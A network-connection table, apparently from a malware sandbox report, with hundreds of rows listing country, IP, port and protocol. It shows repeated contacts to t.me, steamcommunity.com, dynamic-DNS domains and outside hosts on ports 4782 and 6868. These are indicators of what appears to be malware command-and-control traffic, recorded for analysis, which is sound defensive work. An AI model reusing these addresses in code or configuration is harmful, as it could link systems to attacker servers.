| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| FR | 82.64.156.123:80 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| FR | 82.64.156.123:80 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 8.8.8.8:53 | navegacionseguracol24vip.org | udp |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 8.8.8.8:53 | newstaticfreepoint24.ddns-ip.net | udp |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
